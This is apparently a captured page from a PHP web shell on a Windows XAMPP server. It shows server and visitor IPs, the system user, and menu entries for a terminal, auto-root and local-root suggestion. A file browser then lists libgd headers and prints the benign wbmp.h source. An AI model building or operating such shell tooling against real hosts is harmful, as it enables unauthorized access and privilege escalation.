Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.140
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
xampp /
php /
include /
ext /
gd /
libgd /
Delete
Unzip
Name
Size
Permission
Date
Action
bmp.h
2.39
KB
-rw-rw-rw-
2024-07-02 16:10
gd.h
33.76
KB
-rw-rw-rw-
2024-07-02 16:10
gd_errors.h
673
B
-rw-rw-rw-
2024-07-02 16:10
gd_intern.h
348
B
-rw-rw-rw-
2024-07-02 16:10
gd_io.h
1.05
KB
-rw-rw-rw-
2024-07-02 16:10
gd_tga.h
1.66
KB
-rw-rw-rw-
2024-07-02 16:10
gdcache.h
2.68
KB
-rw-rw-rw-
2024-07-02 16:10
gdfontg.h
529
B
-rw-rw-rw-
2024-07-02 16:10
gdfontl.h
527
B
-rw-rw-rw-
2024-07-02 16:10
gdfontmb.h
495
B
-rw-rw-rw-
2024-07-02 16:10
gdfonts.h
491
B
-rw-rw-rw-
2024-07-02 16:10
gdfontt.h
522
B
-rw-rw-rw-
2024-07-02 16:10
gdhelpers.h
1.54
KB
-rw-rw-rw-
2024-07-02 16:10
jisx0208.h
69.68
KB
-rw-rw-rw-
2024-07-02 16:10
wbmp.h
1.25
KB
-rw-rw-rw-
2024-07-02 16:10
Save
Rename
/* WBMP ** ---- ** WBMP Level 0: B/W, Uncompressed ** This implements the WBMP format as specified in WAPSpec 1.1 and 1.2. ** It does not support ExtHeaders as defined in the spec. The spec states ** that a WAP client does not need to implement ExtHeaders. ** ** (c) 2000 Johan Van den Brande <johan@vandenbrande.com> ** ** Header file */ #ifndef __WBMP_H #define __WBMP_H 1 #ifdef HAVE_CONFIG_H #include "config.h" #endif #include "php_compat.h" /* WBMP struct ** ----------- ** A Wireless bitmap structure ** */ typedef struct Wbmp_ { int type; /* type of the wbmp */ int width; /* width of the image */ int height; /* height of the image */ int *bitmap; /* pointer to data: 0 = WHITE , 1 = BLACK */ } Wbmp; #define WBMP_WHITE 1 #define WBMP_BLACK 0 /* Proto's ** ------- ** */ void putmbi( int i, void (*putout)(int c, void *out), void *out); int getmbi ( int (*getin)(void *in), void *in ); int skipheader( int (*getin)(void *in), void *in ); Wbmp *createwbmp( int width, int height, int color ); int readwbmp( int (*getin)(void *in), void *in, Wbmp **wbmp ); int writewbmp( Wbmp *wbmp, void (*putout)( int c, void *out), void *out); void freewbmp( Wbmp *wbmp ); void printwbmp( Wbmp *wbmp ); #endif